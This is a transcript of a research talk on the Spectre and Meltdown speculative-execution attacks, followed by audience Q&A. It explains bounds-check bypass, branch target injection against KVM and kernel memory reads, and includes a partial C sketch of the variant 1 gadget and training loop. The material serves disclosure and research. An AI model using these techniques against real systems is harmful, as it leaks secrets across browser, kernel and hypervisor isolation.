Okay. So I'm Jann Horn from Google Project Zero, and I'm presenting slides that were prepared together with Paul Kocher, Daniel Genkin, and Yuval Yarom. I'm speaking on Spectre and Meltdown: how you can leak data out of speculative execution. This work involves a lot of other researchers. For Meltdown, there were Werner Haas and Thomas Prescher from Cyberus Technology; Daniel Gruss, Moritz Lipp, Stefan Mangard, and Michael Schwarz; Anders Fogh was credited by the other researchers for early contributions of ideas; and Mike Hamburg from Rambus was also involved. Okay. So, basic outline: I'm first going to present shared concepts for the attack variants, then I'm going to give an overview of the three variants, and then explain how each of the variants works. Okay. So, basic recap: there are covert channels in modern CPUs, and in particular I'm going to look at the cache-based covert channel, which is that basically the pattern of memory accesses you perform affects the state of the data cache, and then subsequent memory accesses have timing that depends on the data cache state. So this means that by measuring the timings of memory accesses, you can get information about the memory addresses that were accessed previously. There are a bunch of attacks you can do with that, and here I'm just going to be talking about Flush+Reload, because that's the simplest one. Normally this is used as a side channel to attack things like cryptographic implementations and leak keys, but here it makes more sense to conceptualize it as a covert channel. I should note that there are other covert channels, so if you want to mitigate these issues, just mitigating the cache-based covert channel probably won't cut it. Okay. So what are speculative execution, out-of-order execution, branch prediction, and pipelining, and what does that mean?
So basically the idea is that the processor can execute instructions in parallel, and even in a different order than they appear in the machine code, and that the processor can also predict branches before the target of a branch is known. So in this code example, you can see in the first line two accesses to a foo array. If you look at the machine code, it looks as if the CPU would first load the value of the foo array at index one and then load the value of the foo array at index two. But memory accesses can have quite high latency, and so the processor can perform these two memory accesses more or less in parallel, so that the total execution time of this first line goes down. Next, you can see that there's a branch where, depending on the result of the expression in the first line, we're going to execute either line two or line four. And again, there could be high latencies both in line one and in line two, and so the processor can predict that we're going to be executing line two even before the condition in line one has been evaluated. Then the processor can go ahead and even do the third memory access in parallel together with the first two memory accesses, just to make things even quicker. Okay. So of course, this can go wrong, because we can predict that we're going to execute the one line when actually we're going to have to execute the other one. That's mis-speculation. This can be caused not just by incorrect prediction of branches, but also by exceptions that occur in the middle of a series of instructions. So for example, if one instruction causes a page fault and you've already started executing the subsequent instructions, you're going to have to discard the changes made by those instructions.
So this is implemented by preserving the old register state while executing instructions speculatively, so you can roll back the state of the registers, and memory writes are buffered inside the processor core and not written back to memory until the CPU is sure that they should actually be executed, so that you don't have to go back to memory and undo changes there. But importantly, changes to the data cache are not restored, because the data cache is not something that you really see architecturally when you write a normal program, and actually keeping stuff in the cache helps make things run faster. So cache modifications are not restored. And this means that you get a covert channel out of mis-speculation. So if you have either a branch that's mispredicted or an instruction that actually faults, and the CPU continues executing, here on the left side, at the predicted target, then you have these transient instructions that will be rolled back later. But from inside these transient instructions, you can send on a cache-based covert channel. And then, when the CPU has rolled back your transient instructions and starts executing the architectural control flow, the stuff that's actually supposed to happen according to the documentation, you can do timings there and use those to read from the cache-based covert channel. So this means you get a covert channel out of these transient instructions and can leak data to which you have access in these transient instructions. Okay, so a quick overview of the three variants. The naming is a bit confusing because there are multiple people supplying names. So we have the first two variants, which are named Spectre, and the third variant, which is named Meltdown. The first variant can more or less be characterized as bypassing bounds checks, and primarily affects things like interpreters and JITs, although that's not necessarily all you can do with it.
The second variant is an injection of branch targets and primarily affects things like kernels and hypervisors, but again, theoretically also other things. And Meltdown just affects operating system kernels, and software that architecturally behaves like an operating system kernel. Okay, so let's start looking at the first variant. So here we have a conditional branch where we have this attacker-controlled X, highlighted in red, that is compared to an array size, and only if X is below the array size do we actually do an access. If you look at this architecturally, it all looks fine: if X is too big, we just don't execute the second line. But if you look at this with knowledge of the speculation that processors do, and this branch prediction, then you can see that an attacker can first train the branch prediction to assume that X will be smaller than this array size, and then make sure that the cache line that contains the size of the array is evicted to main memory, so that when the processor tries to evaluate the condition in the first line, it has to go back to main memory and wait for the memory access to finish before it can actually resolve the branch in the first line. Then the attacker can use that to cause the second line to be executed as transient instructions, and you can see that in these transient instructions, you will have an out-of-bounds memory access into the first array. So you read memory, but it's out-of-bounds and belongs to something else entirely in your process. Then you multiply what you read by 256 and use it as an index into a second array. This means that every distinct value that could be at this out-of-bounds position in array one maps to a different cache line that is used for the access to array two, which means that later, you can leak exactly what the value was by measuring which cache line in array two becomes fast.
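In C, the variant 1 pattern just discussed looks roughly like this. The sketch is modeled on the publicly released spectre.c proof of concept; the names follow the talk, but the 512-byte stride (the talk's slide uses 256), the loop counts, and the delay loop are illustrative assumptions, it is x86-specific because of `_mm_clflush`, and whether the transient load is actually observable depends on the CPU and its mitigations.

```c
// Hedged sketch of the Spectre variant 1 gadget and training loop;
// constants and structure are illustrative, modeled on public PoCs.
#include <stddef.h>
#include <stdint.h>
#include <x86intrin.h>

uint8_t array1[16];
unsigned int array1_size = 16;
uint8_t array2[256 * 512]; // probe buffer: one slot per possible byte value
uint8_t temp;              // stops the compiler from optimizing the read away

// Architecturally this is safe. But with a trained branch predictor and
// array1_size evicted from the cache, array1[x] can be read transiently
// even for out-of-bounds x, and the value encoded into array2's cache state.
void victim_function(size_t x) {
    if (x < array1_size)
        temp &= array2[array1[x] * 512];
}

// One attack round (schematic): train the branch in-bounds, flush the
// length so the bounds check resolves late, then pass the malicious index.
void attack_round(size_t malicious_x) {
    for (int i = 0; i < 30; i++)
        victim_function(i % array1_size);     // train: branch taken
    _mm_clflush(&array1_size);                // delay the bounds check
    for (volatile int z = 0; z < 100; z++) {} // let the flush take effect
    victim_function(malicious_x);             // transient out-of-bounds read
}
```

Afterwards, the attacker would Flush+Reload each of the 256 slots of array2 to see which one became cached, revealing the out-of-bounds byte.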
Okay, so in practice, where is this relevant? One interesting example is JavaScript sandboxes. JavaScript code runs in a sandbox that tries to enforce memory safety: you're not permitted to read arbitrary memory, not permitted to dereference arbitrary pointers, and you can't just access arrays out-of-bounds, and so on. But the browser runs JavaScript from untrusted websites. So we can try to use JavaScript to create a construct like the one we saw on the last slide. The JavaScript engine will have to either interpret the code or compile it, and will insert bounds checks and things like that to ensure memory safety. But with speculative execution, we can potentially bypass these safety checks and access memory that actually should not be accessible to us. So here's a code example of how that looks in JavaScript. You can see that it more or less looks like the code we saw previously: you again have this pattern of a comparison, then a first array access, and then mapping to a position in a second array. But there are some differences. Again, we have this index that will be in-bounds to train the branch prediction and then out-of-bounds to actually read out-of-bounds memory. We again have an array length we're comparing against, where we want the length to not be in the processor cache when we're actually doing the attack, so that the processor transiently executes lines two, three, and four before the condition in line one has been resolved. One thing to note here is that, of course, the JavaScript JIT engine will itself make sure that we are not accessing things out-of-bounds, but we don't want the bounds check that the JIT engine would generate if it thinks it has to generate one for us. So we do the check ourselves, and then we do the actual out-of-bounds memory read. Both in line two and in line three, you can see these "|0"s.
They're just tricks to make the JavaScript optimizer generate more optimal code so that the attack works better. Here you can see that we are ANDing the value that we read with a constant. This serves to show the JIT engine that there's a maximum bound on this value, so that the JIT engine does not have to insert its own bounds checks that might make things slower for us. Again, we have this multiplication to map the value to a lot of different cache lines depending on what the value is, and we access the table into which we're going to leak the data. And last, because this is a JavaScript engine, and JavaScript engines love to optimize things away, we have to provide some output where the JIT engine can't prove that it won't be used. That's what the local junk variable is for. Okay, so variant two. The basic idea here is that we have branch prediction in the processor, and this branch prediction can predict the conditional jumps that we've seen before, but it can also predict indirect calls, that is, calls where the target instruction pointer is coming, for example, from a location in memory. This branch prediction uses a table called the branch target buffer, and at least on an Intel Haswell processor, it seems to be indexed and tagged by a partial virtual address and a fingerprint of recent branch history. Now, the thing about branch prediction is, as we've seen, it's expected to sometimes be wrong, and this means that, unlike, for example, a data cache, which always has to return correct information, the branch target buffer can be designed so that it sometimes returns invalid data. You just shouldn't do it too often, because then you hurt performance.
So the branch target buffer is therefore not always uniquely tagged, and many branch target buffer implementations, like in the Intel Haswell processor, do not tag by security domain, for example whether you're in the kernel or in user space, or whether you're inside or outside of a VM. There was prior research that used this to break address space layout randomization (ASLR) across security domains. So you can, for example, have two processes running in user space, where the victim process just runs some code that has branches in it, and then the attacker code times some branches of its own and can use that to infer things about the state of the branch target buffer, which reveals where the code is located in the victim context. You can also do that from inside a virtualization guest to figure out where the hypervisor is located in host memory. And the new thing here is that you can also do this the other way around. So instead of using the branch target buffer to leak data from the victim to the attacker, you can use it to inject branches from the attacker into the victim. If you can insert entries into the branch target buffer, you can cause the target context to start executing transient instructions at an, on some implementations, completely attacker-controlled address. Yeah, so I wrote a proof of concept for this against the KVM hypervisor. This is just a very rough overview, but basically the idea is that first you break the hypervisor's ASLR using the branch-target-buffer leak of address information, as shown in prior research. Then you try to misdirect the first indirect branch that occurs after a guest exit, when you switch from the guest back into hypervisor context, and you flush the cache line that contains the memory operand of the indirect call, such that the indirect call takes a couple of hundred cycles to resolve, during which you can get transient execution at an arbitrary address.
Now, one thing that helps with the attack here is that the register state of the virtualization guest becomes the register state of the hypervisor when you switch from the guest to the hypervisor; all the general-purpose registers stay the same. Then, of course, the hypervisor is going to start using these registers itself, which will clobber most of them, but at least in some kernel builds you can see that at the time of the first indirect call, you still have control over something like four registers, which you can use to get more control over what the code you're misdirecting execution to in the hypervisor will actually end up doing. Also, guest memory is mapped in the hypervisor. So while the hypervisor and the guest don't share their virtual address space, the hypervisor has a separate mapping of all the pages that you have in the guest. This means that if you can figure out where this mapping in the hypervisor is, you can place guest-controlled data in hypervisor memory and then reference this memory from the instructions that you're transiently executing, to get even more control over the execution in the hypervisor. And one particular thing you can do with that in the case of KVM is that there's this eBPF bytecode interpreter in the hypervisor, which basically has this function that you see at the bottom of the screen, the BPF program runner. As a second argument, it takes an array of instructions in some bytecode format, and it will then run those instructions. So with the code gadget that you see above that, you can first get control of the second argument register, RSI, using the register R9, which you already control. And then you can use your control over the register R8, and over memory, to provide the destination of the call. That then lets you run arbitrary bytecode in the hypervisor during transient execution.
Then you can use the bytecode to read memory and leak the data into the cache, and then leak the data out of the cache in the guest. Okay, so now Meltdown, or variant three. Here on the right-hand side, you can see a rough depiction of the virtual memory layout of a user space process. You can see that the virtual address space of user space and kernel space is shared, at least on, for example, x86. So while user space does not actually have permission to access the kernel mappings, the kernel mappings are present in the same page tables that user space is using, and there's a bit in the page table entry that says whether you're supposed to be able to access some memory from user space or just from kernel space. And now we're just going to use more or less the same pattern that we were already using for variant one, where we start by dereferencing some pointer. But importantly, in this case, the pointer points, as you can see on the right side, into kernel space, specifically into this mapping of all physical memory that kernels tend to have. And we just try to do this read. Obviously, this instruction will not be able to architecturally execute completely because, well, this is kernel memory, and we can't just architecturally access kernel memory. But it turns out that, on at least some processors, you can continue execution in transient instructions after such a dereference of kernel memory, and the value that the read returns is accessible to the following transient instructions. So again, we take this value, we map it to values that are sparser, so that each different value maps to a different cache line, and use it to access this array two to leak the data into the cache. Then the execution of this will be terminated, because we accessed kernel memory, but at this point it's too late, and we can use architectural code to leak the data back out of the cache via this array two and figure out what the value was.
So it's not entirely clear yet what's going on in the variant three attack. There seems to be some race condition involved in a privilege check in the processor, and the pretty straightforward result is that you can leak cached data from the kernel, in particular from the L1 data cache. But the TU Graz people have also figured out that you can read uncached data; it's just not entirely clear yet what precisely influences how well that attack works. One last thing: you saw on this slide that we were doing this dereference of a kernel address, and I said that this is not going to architecturally execute; the processor will raise a page fault because we are accessing an address we're not supposed to be able to access. There are three ways you can deal with that, because normally the kernel will just terminate your program when you get the page fault. First, you can use a signal handler, so you can just tell the operating system: hey, when I get a page fault, I would like to continue execution. Obviously that's a very noisy approach, but it works. The second way is to use the TSX instructions that you have on some processors, where, before you do the actual access to a kernel pointer, you can tell the processor that if something bad happens, it should just roll back the execution state and do something different. Or the last option is to put a mispredicted branch in front of the faulting instruction, so that even the faulting instruction itself is just running as a transient instruction and is not actually being executed architecturally. Okay, so basically, in conclusion: there are covert channels in CPUs, and they're useful for more than just transferring secrets between cooperating parties; they can be used to leak data across trust domains that are supposed to be isolated from each other. And while most security issues are correctness issues, not all security issues are correctness issues. Okay, here are some references.
First, the various research papers and blog posts about this issue, and then some prior research that I mentioned in this talk. Yeah, and I'm done. Okay. So we actually have plenty of time for questions, so I would invite people to come and take the mic if there's something you'd like to ask. And if you're planning on speaking in the, my goodness, the line is forming over here for the lightning talk session. Okay, let me lead off the questioning by asking Jann a little bit about, as much as you can say, the disclosure process that was followed here, and how the different groups were interacting with each other throughout this process. I think that's an interesting part of the story which you haven't really touched on in your presentation. Yeah, okay. So we, Project Zero, reported this issue to Intel, AMD and ARM at the start of June last year. And I didn't hear from the other researchers until sometime later in the year, when Intel contacted me and said that they'd been contacted by other security researchers. Okay. So you're playing that one with a straight bat, but that's fine. There are questions from the mic. Matt Watson. So I would just like to ask: you didn't really talk about cache coherency. If you have a multiprocessor system, are these transient instructions going to generate changes in the caches of other processors as well? You mean whether they're going to have effects where, for example, a cache line that was exclusive becomes a shared cache line? I would think so, but I'm not sure whether I've actually tested that. Okay. This is a pretty significant attack and quite hard to mitigate. I was wondering if you think that this is the kind of thing that, as vendors develop patches and patches get rolled out, simply gets solved, or do you think it's pretty much the end of civilization as we know it?
Well, I think variant three seems to be pretty easy to mitigate. From what I've seen of the responses of vendors, it looks like the KAISER patches, now called KPTI, that Daniel Gruss and other researchers developed are going to solve that pretty well. The other variants I'm not so sure about. Hi, thank you for your talk. I hope this is still a cool question: what was your and your colleagues' reaction when you first stumbled across Spectre and Meltdown? Good question. It was like half a year ago, so I'm not entirely sure anymore. I think it was a relatively gradual thing; it wasn't as if we had suddenly stumbled over the whole thing at once. Only with time did it become clear what it means. Okay, and how has your life been affected by the media leaks in the recent week? Has it changed? I don't really want to comment on that. Okay, thank you. So speaking of media leaks, it's very unclear in some of the media articles that have been written exactly which processors are vulnerable to which variants of the attack. As far as I can tell, everything works on Intel. But what about ARM? Do all three variants work on ARM as well, and so on? So, ARM actually published a website with a table that clearly says which specific processors are vulnerable to which specific variant. Okay, thank you. What does this mean for trusted execution environments such as Intel's SGX? Do you have any thoughts on that? I've been wondering about that, but I didn't really look into it, so I can't comment on that. There is something going around on Twitter, but I have no idea. Do you have any thoughts on how these flaws existed for, I presume, a couple of years, and then all of a sudden two or three different research groups all stumbled across them within some short time interval? That seems sort of interesting.
So it seems to me that the topic of cache attacks has come up quite frequently in the last years, this idea that there are cache side channels that you can use to perform such attacks. For me personally, it's something that I've become more aware of in the last couple of years, and without that, I probably wouldn't have stumbled over it. I'm not sure whether that's true for the other researchers; I think Paul Kocher in particular probably has a lot of prior experience with that. You alluded to this being one of a class of side-channel attacks. Do you have any further pointers to what areas of research are likely to be fruitful there? So I haven't really looked into that much, but there are some papers showing, for example, that not just the cache timing, but also the timing of DRAM accesses differs based on previous memory accesses. And I think Paul Kocher pointed out that you could try to time the length of the transient execution instead of afterwards trying to leak things from the cache. And there's also some research, I think from Sophia D'Antoine, about leaking information between hyperthreads about which execution units are being used by the other hyperthread, because hyperthreads share the execution units, and so there's some scheduling going on. That means that you can observe, through how the CPU schedules things out of order, what the other thread is doing, on a relatively coarse level. Okay, I think there are no more questions. One more up here. A great point at which we should end. Oh, sorry. Questions upstairs, where? Okay, go ahead. Surprise. So paradigmatic attacks like this tend to generate hasty fixes that are broken pretty quickly thereafter, when the next paper season comes around.
What do you think vendors can do, especially for something like this, to make sure that their fixes address the underlying problem more generally, rather than just papering over the existing attacks? Well, I mean, that's on the processor vendors. They are the only ones who are really in a position to completely review what the processor is doing. So I don't think that's something I could, for example, particularly help with. Thank you. Okay, I think that's a great place to stop. So let's thank the speaker again. Thank you very much.